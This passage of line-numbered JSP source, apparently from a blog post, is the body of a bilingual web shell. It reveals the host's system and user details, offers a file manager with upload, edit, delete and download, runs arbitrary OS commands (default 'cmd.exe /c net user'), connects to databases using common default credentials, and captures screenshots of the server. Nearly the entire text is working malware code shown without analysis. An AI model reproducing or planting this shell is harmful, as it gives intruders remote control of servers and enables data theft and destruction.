+ " " + System.getProperty("os.version") + " "+ System.getProperty("os.arch")%></td> 957 </tr> 958 <tr> 959 <td><%=orChinese("Computer Name") %></td> 960 <td><%=System.getenv().get("COMPUTERNAME")%></td> 961 </tr> 962 <tr> 963 <td><%=orChinese("Available Processors") %></td> 964 <td><%=Runtime.getRuntime().availableProcessors() %></td> 965 </tr> 966 <tr> 967 <td><%=orChinese("IP") %></td> 968 <td><%=InetAddress.getLocalHost().getHostAddress().toString() %></td> 969 </tr> 970 <tr> 971 <td><%=orChinese("System Driver") %></td> 972 <td><%=System.getenv().get("SystemDrive")%></td> 973 </tr> 974 <tr> 975 <td><%=orChinese("Driver Info") %></td> 976 <td><%=getDriverInfo() %></td> 977 </tr> 978 <tr> 979 <td><%=orChinese("User Name") %></td> 980 <td><%=System.getenv().get("USERNAME")%></td> 981 </tr> 982 <tr> 983 <td><%=orChinese("User Domain") %></td> 984 <td><%=System.getenv().get("USERDOMAIN")%></td> 985 </tr> 986 <tr> 987 <td><%=orChinese("User DNS Domain") %></td> 988 <td><%=System.getenv().get("USERDNSDOMAIN")%></td> 989 </tr> 990 <tr> 991 <td><%=orChinese("User Profile") %></td> 992 <td><%=System.getenv().get("USERPROFILE")%></td> 993 </tr> 994 <tr> 995 <td><%=orChinese("All User Profile") %></td> 996 <td><%=System.getenv().get("ALLUSERSPROFILE")%></td> 997 </tr> 998 <tr> 999 <td><%=orChinese("Temp") %></td> 1000 <td><%=System.getenv().get("TEMP")%></td> 1001 </tr> 1002 <tr> 1003 <td><%=orChinese("Program Files") %></td> 1004 <td><%=System.getenv().get("ProgramFiles")%></td> 1005 </tr> 1006 <tr> 1007 <td><%=orChinese("AppData") %></td> 1008 <td><%=System.getenv().get("APPDATA")%></td> 1009 </tr> 1010 <tr> 1011 <td><%=orChinese("System Root") %></td> 1012 <td><%=System.getenv().get("SystemRoot")%></td> 1013 </tr> 1014 <tr> 1015 <td><%=orChinese("Console") %></td> 1016 <td><%=System.getenv().get("ComSpec")%></td> 1017 </tr> 1018 <tr> 1019 <td><%=orChinese("File Executable") %></td> 1020 <td><%=System.getenv().get("PATHEXT")%></td> 1021 </tr> 1022 <tr> 1023 
<td><%=orChinese("My Path") %></td> 1024 <td><%=request.getSession().getServletContext().getRealPath(request.getServletPath())%></td> 1025 </tr> 1026 <tr> 1027 <td><%=orChinese("User Dir") %></td> 1028 <td><%=System.getProperty("user.dir")%></td> 1029 </tr> 1030 <tr> 1031 <td><%=orChinese("Protocol") %></td> 1032 <td><%=request.getProtocol()%></td> 1033 </tr> 1034 <tr> 1035 <td><%=orChinese("Server Info") %></td> 1036 <td><%=application.getServerInfo()%></td> 1037 </tr> 1038 <tr> 1039 <td><%=orChinese("JDK Version") %></td> 1040 <td><%=System.getProperty("java.version")%></td> 1041 </tr> 1042 <tr> 1043 <td><%=orChinese("JDK Home") %></td> 1044 <td><%=System.getProperty("java.home")%></td> 1045 </tr> 1046 <tr> 1047 <td><%=orChinese("JVM Version") %></td> 1048 <td><%=System.getProperty("java.vm.specification.version")%></td> 1049 </tr> 1050 <tr> 1051 <td><%=orChinese("JVM Name") %></td> 1052 <td><%=System.getProperty("java.vm.name")%></td> 1053 </tr> 1054 <tr> 1055 <td><%=orChinese("Class Path") %></td> 1056 <td><%=System.getProperty("java.class.path")%></td> 1057 </tr> 1058 <tr> 1059 <td><%=orChinese("Java Library Path") %></td> 1060 <td><%=System.getProperty("java.library.path")%></td> 1061 </tr> 1062 <tr> 1063 <td><%=orChinese("Java tmpdir") %></td> 1064 <td><%=System.getProperty("java.io.tmpdir")%></td> 1065 </tr> 1066 <tr> 1067 <td><%=orChinese("Compiler") %></td> 1068 <td><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td> 1069 </tr> 1070 <tr> 1071 <td><%=orChinese("Java ext dirs") %></td> 1072 <td><%=System.getProperty("java.ext.dirs")%></td> 1073 </tr> 1074 <tr> 1075 <td><%=orChinese("Remote Addr") %></td> 1076 <td><%=request.getRemoteAddr()%></td> 1077 </tr> 1078 <tr> 1079 <td><%=orChinese("Remote Host") %></td> 1080 <td><%=request.getRemoteHost()%></td> 1081 </tr> 1082 <tr> 1083 <td><%=orChinese("Remote User") %></td> 1084 <td><%=request.getRemoteUser() == null ? 
"" : request.getRemoteUser()%></td> 1085 </tr> 1086 <tr> 1087 <td><%=orChinese("Scheme") %></td> 1088 <td><%=request.getScheme()%></td> 1089 </tr> 1090 <tr> 1091 <td><%=orChinese("Secure") %></td> 1092 <td><%=request.isSecure() == true ? orChinese("Yes") : orChinese("No") %></td> 1093 </tr> 1094 </table> 1095 <% 1096 } 1097 if (action.equals("file")) { 1098 String curPath = ""; 1099 String result = ""; 1100 String fsAction = ""; 1101 if (request.getParameter("curPath") == null) { 1102 curPath = request.getSession().getServletContext().getRealPath(request.getServletPath()); 1103 curPath = pathConvert((new File(curPath)).getParent()); 1104 } 1105 else { 1106 curPath = Unicode2GB((String)request.getParameter("curPath")); 1107 curPath = pathConvert(curPath); 1108 } 1109 if (request.getParameter("fsAction") == null) { 1110 fsAction = "list"; 1111 } else { 1112 fsAction = (String)request.getParameter("fsAction"); 1113 } 1114 if (fsAction.equals("list")){ 1115 %> 1116 <div class="container"> 1117 <form method="post" name="form3" action="<%= request.getRequestURI() + "?action=file"%>"> 1118 <div align="left"> 1119 1120 <input type="text" class="trans" size="100" name="curPath" value="<%=curPath%>" /> <input type="submit" value="<%=orChinese("GOTO") %>" 1121 class="trans" /> <input type="button" value="<%=orChinese("Home") %>" class="trans" 1122 onclick="javascript:document.getElementById(‘file_system‘).click();" /> 1123 <% 1124 String os = System.getProperties().getProperty("os.name"); 1125 if (os.toUpperCase().contains("WIN")){ 1126 File[] files = File.listRoots(); 1127 for(int i = 0; i < files.length; i++) { 1128 %> 1129 <input type="button" class="trans" 1130 onclick="javascript:window.location.href=‘<%= request.getRequestURI() + "?action=file&curPath=" + files[i].getPath().replace("\\\\", "/")%>‘" 1131 value="<%= files[i]%>" /> 1132 <% 1133 } 1134 } 1135 %> 1136 1137 </div> 1138 <table class="onhover" style="width: 100%"> 1139 <tr> 1140 <td 
align="center"><%=orChinese("File Name") %></td> 1141 <td align="center" width="10%"><%=orChinese("Size") %></td> 1142 <td align="center" width="38%"><%=orChinese("Operation") %></td> 1143 </tr> 1144 <tr> 1145 <% 1146 File curFolder = new File(curPath); 1147 %> 1148 <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=curFolder.getParent() %>">[..]</a></td> 1149 <td align="right"></td> 1150 <td></td> 1151 </tr> 1152 <% 1153 for (File file : this.getFolderList(curPath)){ 1154 MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath ); 1155 f.setHtmlOperation(Operation.Rename,Operation.Delete,Operation.Download); 1156 %> 1157 <tr> 1158 <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=f.getAbsolutePath() %>">[<%=f.getName() %>] 1159 </a></td> 1160 <td align="right"><%=f.getLength() %></td> 1161 <td><%=f.getHtmlOperation() %></td> 1162 </tr> 1163 <% 1164 } 1165 for (File file : this.getFileList(curPath)){ 1166 MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath ); 1167 f.setHtmlOperation(Operation.Edit,Operation.Rename,Operation.Delete,Operation.Download); 1168 %> 1169 <tr> 1170 <td><%=f.getName() %></td> 1171 <td align="right"><%=f.getLength() %></td> 1172 <td><%=f.getHtmlOperation() %></td> 1173 </tr> 1174 <% 1175 } 1176 %> 1177 </table> 1178 <div align="left"> 1179 <table style="width: 100%;"> 1180 <tr> 1181 <td align="left" style="border: 0"> 1182 <input type="text" name="uploadFilePath" id="uploadFilePath" size="60" class="trans" /> 1183 <input type="button" value="<%=orChinese("Select")%>" class="trans" onclick="javascript:document.getElementById(‘fileSelect‘).click()"> 1184 <input type="button" value="<%=orChinese("Upload")%>" class="trans" onclick="javascript:document.getElementById(‘uploadform‘).submit()" /> 1185 </td> 1186 <td align="right" style="border: 0"> 1187 <input type="text" id="createFileName" class="trans" size="26" 
name="fileName" /> 1188 <input type="button" class="trans" value="<%=orChinese("Create File")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFile"%>")‘> 1189 <input type="button" class="trans" value="<%=orChinese("Create Folder")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFolder"%>")‘> 1190 </td> 1191 </tr> 1192 </table> 1193 </div> 1194 </form> 1195 <div align="left"> 1196 <form id="uploadform" name="upload" enctype="multipart/form-data" method="post" 1197 action="<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=upload"%>"> 1198 <input type="file" style="display: none" name="upFile" id="fileSelect" 1199 onchange="javascript:document.getElementById(‘uploadFilePath‘).value=this.value" /> 1200 </form> 1201 </div> 1202 </div> 1203 1204 <% 1205 }else if (fsAction.equals("Edit")){ 1206 if (request.getParameter("fileName") == null) { 1207 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1208 } else { 1209 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1210 result = openFile(curPath, fileName, request.getRequestURI() + "?action=" + action); 1211 } 1212 }else if (fsAction.equals("save")) { 1213 if (request.getParameter("fileContent") == null) { 1214 result = "<font color=\\"red\\">"+orChinese("Content is null")+"</font>"; 1215 } else { 1216 if (request.getParameter("fileName") == null) { 1217 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1218 } else { 1219 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1220 String fileContent = Unicode2GB((String)request.getParameter("fileContent")); 1221 result = saveFile(curPath, fileName, request.getRequestURI() + "?action=" + action, fileContent); 1222 } 1223 } 1224 } else if (fsAction.equals("createFolder")) { 1225 
if (request.getParameter("fileName") == null) { 1226 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1227 } else { 1228 String folderName = Unicode2GB(request.getParameter("fileName").trim()); 1229 if (folderName.equals("")) { 1230 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1231 } else { 1232 result = createFolder(curPath,folderName,request.getRequestURI() + "?action=" + action); 1233 } 1234 } 1235 } else if (fsAction.equals("createFile")) { 1236 if (request.getParameter("fileName") == null) { 1237 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>"; 1238 } else { 1239 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1240 if (fileName.equals("")) { 1241 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>"; 1242 } else { 1243 result = createFile(curPath,fileName,request.getRequestURI() + "?action=" + action); 1244 } 1245 } 1246 } else if (fsAction.equals("Delete")) { 1247 String fileName= Unicode2GB(request.getParameter("fileName").trim()); 1248 result = deleteFile(curPath,fileName,request.getRequestURI() + "?action=" + action); 1249 } else if (fsAction.equals("upload")) { 1250 result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); 1251 } else if (fsAction.equals("Rename")) { 1252 String newName = Unicode2GB(request.getParameter("newName").trim()); 1253 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1254 result = rename(curPath,fileName,newName,request.getRequestURI() + "?action=" + action); 1255 } else if (fsAction.equals("Download")) { 1256 String fileName= Unicode2GB(request.getParameter("fileName").trim()); 1257 result = download(curPath,fileName,request.getRequestURI() + "?action=" + action, response); 1258 } 1259 %> 1260 <div class="container"> 
1261 <font color="red"><%=result %></font> 1262 </div> 1263 <% 1264 } 1265 if (action.equals("search")) { 1266 String curPath = request.getSession().getServletContext().getRealPath(request.getServletPath()); 1267 curPath = pathConvert((new File(curPath)).getParent()); 1268 1269 String searchpath = Unicode2GB(request.getParameter("searchpath")); 1270 if (searchpath == null || searchpath.trim().length() == 0){ 1271 searchpath = curPath; 1272 } 1273 String searchsubfix = Unicode2GB(request.getParameter("searchsubfix")); 1274 if (searchsubfix == null || searchsubfix.trim().length() == 0){ 1275 searchsubfix = ".jsp .html .htm"; 1276 } 1277 String searchby = request.getParameter("searchby"); 1278 String ignorecase = request.getParameter("ignorecase"); 1279 String searchcontent = Unicode2GB(request.getParameter("searchcontent")); 1280 if (searchcontent == null || searchcontent.trim().length() == 0){ 1281 searchcontent = "index"; 1282 } 1283 String fsAction = request.getParameter("fsAction"); 1284 String searchResult = ""; 1285 if (fsAction != null){ 1286 searchResult = searchFile(searchpath, searchcontent , searchsubfix, "name".equals(searchby),"yes".equals(ignorecase)); 1287 } 1288 %> 1289 <form class="container" name="searchForm" method="post" action="<%=request.getRequestURI() + "?action=search&fsAction=search"%>"> 1290 <table> 1291 <tr> 1292 <td width="260px" align="right"><%=orChinese("Search from") %>:</td> 1293 <td><input type="text" id="searchpath" class="trans" name="searchpath" size="100" value="<%=searchpath %>" /></td> 1294 </tr> 1295 <tr> 1296 <td align="right"><%=orChinese("Search for file type") %>:</td> 1297 <td><input type="text" id="searchsubfix" class="trans" name="searchsubfix" size="100" value="<%=searchsubfix %>" /></td> 1298 </tr> 1299 <tr> 1300 <td align="right"><%=orChinese("Setting") %>:</td> 1301 <td> 1302 <% 1303 if ("content".equals(searchby)){ 1304 %> <input type="radio" class="trans" name="searchby" value="name" /><%=orChinese("Search by 
Name") %> <input type="radio" name="searchby" 1305 class="trans" value="content" checked="checked" /><%=orChinese("Search by Content") %> <% 1306 }else{ 1307 %> <input type="radio" class="trans" name="searchby" value="name" checked="checked" /><%=orChinese("Search by Name") %> <input type="radio" 1308 name="searchby" class="trans" value="content" /><%=orChinese("Search by Content") %> <% 1309 } 1310 if ("yes".equals(ignorecase)){ 1311 %> <input type="checkbox" name="ignorecase" class="trans" value="yes" checked="checked" /><%=orChinese("Ignore Case") %> <% 1312 }else{ 1313 %> <input type="checkbox" name="ignorecase" class="trans" value="yes" /><%=orChinese("Ignore Case") %> <% 1314 } 1315 %> 1316 </td> 1317 </tr> 1318 <tr> 1319 <td align="right"><%=orChinese("Search keyword") %>:</td> 1320 <td><input type="text" id="searchcontent" class="trans" name="searchcontent" size="40" value="<%=searchcontent %>" /> <input type="submit" 1321 value="<%=orChinese("Search") %>" class="trans" /></td> 1322 </tr> 1323 <tr> 1324 <td colspan="2" align="left" id="searchresult"><%=searchResult %></td> 1325 </tr> 1326 </table> 1327 </form> 1328 <% 1329 } 1330 if (action.equals("command")) { 1331 String cmd = ""; 1332 InputStream ins = null; 1333 String result = ""; 1334 1335 if (request.getParameter("command") != null) { 1336 cmd = (String)request.getParameter("command"); 1337 result = exeCmd(cmd); 1338 } 1339 %> 1340 <form class="container" name="form2" method="post" action="<%=request.getRequestURI() + "?action=command"%>"> 1341 <% 1342 if (cmd==null || "".equals(cmd.trim())){ 1343 if (System.getProperty("os.name").toLowerCase().contains("windows")){ 1344 cmd = "cmd.exe /c net user"; 1345 }else{ 1346 cmd = "uname -a"; 1347 } 1348 } 1349 %> 1350 <div align="left"> 1351 <input type="text" size="130" class="trans" size="133" name="command" value="<%=cmd%>" /> <input type="submit" class="trans" 1352 value="<%=orChinese("Execute") %>" /> 1353 </div> 1354 <table style="width: 100%; height: 
100px"> 1355 <tr> 1356 <td><%=result == "" ? " " : result%></td> 1357 </tr> 1358 </table> 1359 </form> 1360 <% 1361 } 1362 if (action.equals("database")) { 1363 String SQLResult = ""; 1364 String dbType = request.getParameter("dbType"); 1365 dbType = dbType == null?"mysql":dbType; 1366 String driver = request.getParameter("driver"); 1367 String port = request.getParameter("port"); 1368 String dbname = Unicode2GB(request.getParameter("dbname")); 1369 String host = Unicode2GB(request.getParameter("host")); 1370 String sql = Unicode2GB(request.getParameter("sql")); 1371 String dbuser = Unicode2GB(request.getParameter("dbuser")); 1372 String dbpass = Unicode2GB(request.getParameter("dbpass")); 1373 String fsAction = request.getParameter("fsAction"); 1374 String connurl = Unicode2GB(request.getParameter("connurl")); 1375 if (sql==null) sql=""; 1376 if (fsAction == null || "typeChange".equals(fsAction)){ 1377 if ("Mysql".equalsIgnoreCase(dbType)){ 1378 driver = "com.mysql.jdbc.Driver"; 1379 port = "3306"; 1380 dbuser = "root"; 1381 dbpass = "root"; 1382 host = "localhost"; 1383 dbname = "mysql"; 1384 }else if("Oracle".equalsIgnoreCase(dbType)){ 1385 driver = "oracle.jdbc.driver.OracleDriver"; 1386 port = "1521"; 1387 dbuser = "scott"; 1388 dbpass = "tiger"; 1389 host = "localhost"; 1390 dbname = "orcl"; 1391 }else if("SQLServer".equalsIgnoreCase(dbType)){ 1392 driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; 1393 port = "1433"; 1394 dbuser = "sa"; 1395 dbpass = "123456"; 1396 host = "localhost"; 1397 dbname = "master"; 1398 }else if("DB2".equalsIgnoreCase(dbType)){ 1399 driver = "com.ibm.db2.jdbc.app.DB2Driver"; 1400 port = "5000"; 1401 dbuser = "db2admin"; 1402 dbpass = "123456"; 1403 host = "localhost"; 1404 dbname = ""; 1405 }else if("Other".equalsIgnoreCase(dbType)){ 1406 driver = "sun.jdbc.odbc.JdbcOdbcDriver"; 1407 connurl = "jdbc:odbc:dsn=dsnName;User=username;Password=password"; 1408 dbuser = ""; 1409 dbpass = ""; 1410 } 1411 }else 
if("connect".equals(fsAction)){ 1412 if (driver!=null){ 1413 Class.forName(driver); 1414 if ("Mysql".equalsIgnoreCase(dbType)){ 1415 connurl = "jdbc:mysql://localhost:"+port+"/" + dbname; 1416 }else if("Oracle".equalsIgnoreCase(dbType)){ 1417 connurl = "jdbc:oracle:[email protected]:"+port+":"+ dbname; 1418 }else if("SQLServer".equalsIgnoreCase(dbType)){ 1419 connurl = "jdbc:sqlserver://localhost:"+port+";databaseName=" + dbname; 1420 }else if("DB2".equalsIgnoreCase(dbType)){ 1421 connurl = "jdbc:db2://localhost:"+port+"/" + dbname; 1422 } 1423 SQLResult = this.DBConnect(connurl, dbuser, dbpass); 1424 } 1425 }else if("disconnect".equals(fsAction)){ 1426 try { 1427 if (dbStatement != null) { 1428 dbStatement.close(); 1429 dbStatement = null; 1430 } 1431 if (conn != null) { 1432 conn.close(); 1433 conn = null; 1434 } 1435 } catch (SQLException e) { 1436 1437 } 1438 }else if("execute".equals(fsAction)){ 1439 SQLResult = DBExecute(sql); 1440 } 1441 %> 1442 <form class="container" id="sqlform" name="sqlform" method="post" action="<%=request.getRequestURI() + "?action=database"%>"> 1443 <table style="width: 100%;"> 1444 <tr> 1445 <td align="right" width="15%"><%=orChinese("Database Type") %>:</td> 1446 <td align="left" width="85%"><select id="dbtype_select" name=dbType style="background-color: black; color: white" 1447 onchange="dbsubmit(‘typeChange‘)"> 1448 <% 1449 if ("Mysql".equalsIgnoreCase(dbType)){ 1450 %> 1451 <option value="Mysql" selected="selected">Mysql</option> 1452 <option value="Oracle">Oracle</option> 1453 <option value="SQLServer">SQLServer</option> 1454 <option value="DB2">DB2</option> 1455 <option value="Other">Other</option> 1456 <% 1457 }else if("Oracle".equalsIgnoreCase(dbType)){ 1458 %> 1459 <option value="Mysql">Mysql</option> 1460 <option value="Oracle" selected="selected">Oracle</option> 1461 <option value="SQLServer">SQLServer</option> 1462 <option value="DB2">DB2</option> 1463 <option value="Other">Other</option> 1464 <% 1465 }else 
if("DB2".equalsIgnoreCase(dbType)){ 1466 %> 1467 <option value="Mysql">Mysql</option> 1468 <option value="Oracle">Oracle</option> 1469 <option value="SQLServer">SQLServer</option> 1470 <option value="DB2" selected="selected">DB2</option> 1471 <option value="Other">Other</option> 1472 <% 1473 }else if("SQLServer".equalsIgnoreCase(dbType)){ 1474 %> 1475 <option value="Mysql">Mysql</option> 1476 <option value="Oracle">Oracle</option> 1477 <option value="SQLServer" selected="selected">SQLServer</option> 1478 <option value="DB2">DB2</option> 1479 <option value="Other">Other</option> 1480 <% 1481 }else if("Other".equalsIgnoreCase(dbType)){ 1482 %> 1483 <option value="Mysql">Mysql</option> 1484 <option value="Oracle">Oracle</option> 1485 <option value="SQLServer">SQLServer</option> 1486 <option value="DB2">DB2</option> 1487 <option value="Other" selected="selected">Other</option> 1488 <% 1489 } 1490 %> 1491 </select></td> 1492 </tr> 1493 1494 <tr> 1495 <td align="right"><%=orChinese("Driver") %>:</td> 1496 <td align="left"><input type="text" size="50" class="trans" name="driver" value="<%=driver %>" /></td> 1497 </tr> 1498 <% 1499 if ("Other".equalsIgnoreCase(dbType)){ 1500 %> 1501 <tr> 1502 <td align="right"><%=orChinese("Connect URL") %>:</td> 1503 <td align="left"><input type="text" size="50" class="trans" name="connurl" value="<%=connurl %>" /></td> 1504 </tr> 1505 <% 1506 }else{ 1507 %> 1508 <tr> 1509 <td align="right"><%=orChinese("Host") %>:</td> 1510 <td align="left"><input type="text" size="50" class="trans" name="host" value="<%=host %>" /></td> 1511 </tr> 1512 <tr> 1513 <td align="right"><%=orChinese("Port") %>:</td> 1514 <td align="left"><input type="text" size="50" class="trans" name="port" value="<%=port %>" /></td> 1515 </tr> 1516 <tr> 1517 <td align="right"><%=orChinese("DB Name") %>:</td> 1518 <td align="left"><input type="text" size="50" class="trans" name="dbname" value="<%=dbname %>" /></td> 1519 </tr> 1520 <% 1521 } 1522 %> 1523 <tr> 1524 <td 
align="right"><%=orChinese("Username") %>:</td> 1525 <td align="left"><input type="text" size="50" class="trans" name="dbuser" value="<%=dbuser %>" /></td> 1526 </tr> 1527 <tr> 1528 <td align="right"><%=orChinese("Password") %>:</td> 1529 <td align="left"><input type="text" size="50" class="trans" name="dbpass" value="<%=dbpass %>" /></td> 1530 </tr> 1531 <tr> 1532 <td align="right"><%=orChinese("Connect") %>:</td> 1533 <td align="left"><input type="button" class="trans" value="<%=orChinese("Connect") %>" onclick="dbsubmit(‘connect‘)" /> <input type="button" 1534 class="trans" value="<%=orChinese("Disconnect") %>" onclick="dbsubmit(‘disconnect‘)" /></td> 1535 </tr> 1536 <tr> 1537 <td align="right"><%=orChinese("SQL") %>:</td> 1538 <td><input type="text" class="trans" size="100" name="sql" value="<%=sql %>" /> <input type="submit" class="trans" 1539 value="<%=orChinese("Execute") %>" onclick="dbsubmit(‘execute‘)" /></td> 1540 </tr> 1541 <tr height="50"> 1542 <td colspan="2"><%=SQLResult %></td> 1543 <tr /> 1544 </table> 1545 </form> 1546 <%} 1547 if (action.equals("screen")){ 1548 %> 1549 <div class="container" align="left"> 1550 <input type="button" value="<%=orChinese("Refresh") %>" class="trans" onclick="javascript:location = location" /> 1551 <img style="-webkit-user-select: none; cursor: zoom-in;" width="100%" src="<%=request.getRequestURI()+"?action=getscreen" %>" /> 1552 </div> 1553 <% 1554 } 1555 if (action.equals("getscreen")){ 1556 out.clear(); 1557 out = pageContext.pushBody(); 1558 this.getScreenImg(request, response); 1559 } 1560 %> 1561 <%}%> 1562 <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=ENG" %>‘,window.location.href)">English</a> 1563 <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=CHN" %>‘,window.location.href)">中文</a> 1564 </body> 1565 </html>
截图: